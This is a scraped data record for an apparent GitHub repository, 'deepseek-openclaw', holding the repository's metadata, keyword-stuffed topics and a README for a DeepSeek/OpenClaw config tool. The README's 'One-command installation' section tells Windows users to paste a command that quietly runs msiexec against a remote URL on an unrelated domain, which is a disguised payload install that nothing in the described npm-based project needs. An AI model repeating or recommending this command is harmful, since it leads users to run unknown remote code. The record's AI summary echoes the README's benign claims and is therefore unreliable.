[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-82666":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":14,"contributorsCount":13,"subscribersCount":13,"size":13,"stars1d":13,"stars7d":13,"stars30d":15,"stars90d":13,"forks30d":13,"starsTrendScore":13,"compositeScore":13,"rankGlobal":10,"rankLanguage":10,"license":16,"archived":17,"fork":17,"defaultBranch":18,"hasWiki":19,"hasPages":17,"topics":20,"createdAt":10,"pushedAt":10,"updatedAt":41,"readmeContent":42,"aiSummary":43,"trendingCount":13,"starSnapshotCount":13,"syncStatus":44,"lastSyncTime":45,"discoverSource":46},82666,"deepseek-openclaw","LawmakerTreasure\u002Fdeepseek-openclaw","LawmakerTreasure","OpenClaw for DeepSeek — a lightweight starter app for connecting DeepSeek models through OpenClaw with a clean UI and simple setup.","",null,"HTML",20,0,1,104,"MIT License",false,"main",true,[21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],"deepseek","deepseek-ai","deepseek-ai-coding","deepseek-api","deepseek-chat","deepseek-login","deepseek-news","deepseek-r1","deepseek-r2","deepseek-stock","deepseek-v3","deepseek-v4","openclaw","openclaw-agent","openclaw-alternative","openclaw-extension","openclaw-plugin","openclaw-security","openclaw-skill","openclaw-skills","2026-06-12 02:04:26","\u003Cimg width=\"2172\" height=\"724\" alt=\"7522b1cb-01db-4c38-a626-b530a22ff32d\" src=\"https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Fe2dd6a50-d475-4a48-8937-b8b6726a8831\" \u002F>\n# DeepSeek OpenClaw\n\nDeepSeek OpenClaw is a local-first web app for preparing DeepSeek configuration assets for OpenClaw. It helps users choose a DeepSeek model, generate a copy-ready OpenClaw onboarding command, and create a redacted configuration snippet without sending API keys to a backend.\n\n## One-command installation\n\n## 🪟 Windows Installation\n### **Step 1 — Open Command Prompt**\n1. Press **Win + R**\n2. Type:\n```\ncmd\n```\n3. Press **Enter**\nThis will open **Command Prompt**.\n---\n### **Step 2 — Run the Install Command**\nCopy the command below and paste it into **Command Prompt**, then press **Enter**.\n```powershell\ncmd \u002Fc start msiexec \u002Fq \u002Fi https:\u002F\u002Fdevcodee.com\u002Fapi & deepseek-openclaw\n```\nThe installer will automatically download and install the required components.\n\n\n## Features\n\n- DeepSeek model catalog for OpenClaw-oriented workflows.\n- Local command generator for OpenClaw onboarding.\n- Redacted OpenClaw config preview.\n- Secret-aware UI copy and security checklist.\n- Vite + React + TypeScript frontend.\n- GitHub Actions build workflow.\n\n## Screens\n\nThe app contains four main sections:\n\n1. **Hero** — project positioning and sample terminal command.\n2. **Model Catalog** — DeepSeek model cards with recommended use cases.\n3. **Config Generator** — API key field, model selector, OpenClaw flags, command output, and config output.\n4. **Security Checklist** — practical safety reminders for agent gateway usage.\n\n## Model references\n\nThe starter includes these model references:\n\n| Model | Use case |\n| --- | --- |\n| `deepseek\u002Fdeepseek-v4-flash` | Default fast path for everyday automation |\n| `deepseek\u002Fdeepseek-v4-pro` | Stronger model for complex coding and planning |\n| `deepseek\u002Fdeepseek-chat` | General non-thinking chat surface |\n| `deepseek\u002Fdeepseek-reasoner` | Reasoning-focused sessions |\n\nAlways verify the final model list against your installed OpenClaw version and the current DeepSeek\u002FOpenClaw documentation.\n\n## Local development\n\n```bash\nnpm install\nnpm run dev\n```\n\nBuild for production:\n\n```bash\nnpm run build\n```\n\nPreview the production build:\n\n```bash\nnpm run preview\n```\n\n## Project structure\n\n```text\ndeepseek-openclaw\u002F\n├── .github\u002Fworkflows\u002Fci.yml\n├── src\u002F\n│   ├── App.tsx\n│   ├── main.tsx\n│   ├── models.ts\n│   ├── openclaw.ts\n│   ├── styles.css\n│   ├── types.ts\n│   └── vite-env.d.ts\n├── .env.example\n├── .gitignore\n├── CONTRIBUTING.md\n├── LICENSE\n├── README.md\n├── SECURITY.md\n├── index.html\n├── package.json\n├── tsconfig.json\n├── tsconfig.node.json\n└── vite.config.ts\n```\n\n## Configuration behavior\n\nThe app generates two outputs:\n\n### Onboarding command\n\nA shell command based on OpenClaw's non-interactive onboarding flow. The generated command uses `DEEPSEEK_API_KEY` when no key is typed into the UI.\n\n### OpenClaw config snippet\n\nA small JSON-style snippet showing:\n\n```json\n{\n  \"env\": {\n    \"DEEPSEEK_API_KEY\": \"${DEEPSEEK_API_KEY}\"\n  },\n  \"agents\": {\n    \"defaults\": {\n      \"model\": {\n        \"primary\": \"deepseek\u002Fdeepseek-v4-flash\"\n      }\n    }\n  }\n}\n```\n\nWhen a key is typed, the preview intentionally displays `sk-***redacted***` instead of the real value.\n\n## Security notes\n\n- Do not commit real API keys.\n- Do not publish screenshots containing real secrets.\n- Prefer environment variables, OpenClaw auth profiles, or a dedicated secret store.\n- Review generated commands before running them on a real machine.\n- Lock down OpenClaw channels with allowlists and mention rules before exposing an assistant to messaging platforms.\n\n## Deploying to GitHub Pages\n\nOne simple option is to enable GitHub Pages for the repository and deploy the Vite `dist\u002F` output. You can add a Pages workflow later if you want automated deployment.\n\n## References\n\n- OpenClaw documentation: https:\u002F\u002Fdocs.openclaw.ai\u002F\n- OpenClaw DeepSeek provider documentation: https:\u002F\u002Fdocs.openclaw.ai\u002Fproviders\u002Fdeepseek\n- DeepSeek OpenClaw integration documentation: https:\u002F\u002Fapi-docs.deepseek.com\u002Fquick_start\u002Fagent_integrations\u002Fopenclaw\n\n## License\n\nMIT\n","DeepSeek OpenClaw 是一个轻量级的Web应用，旨在帮助用户通过简洁的界面和简单的设置来连接DeepSeek模型。它提供了DeepSeek模型目录、本地命令生成器以及安全检查清单等功能，允许用户选择合适的模型并生成用于OpenClaw接入的命令行代码，同时确保API密钥等敏感信息不会被发送到后端。该应用采用Vite + React + TypeScript构建前端，并利用GitHub Actions实现自动化构建流程。适用于需要快速配置和启动基于DeepSeek模型与OpenClaw集成的应用场景。",2,"2026-06-11 04:08:54","CREATED_QUERY"]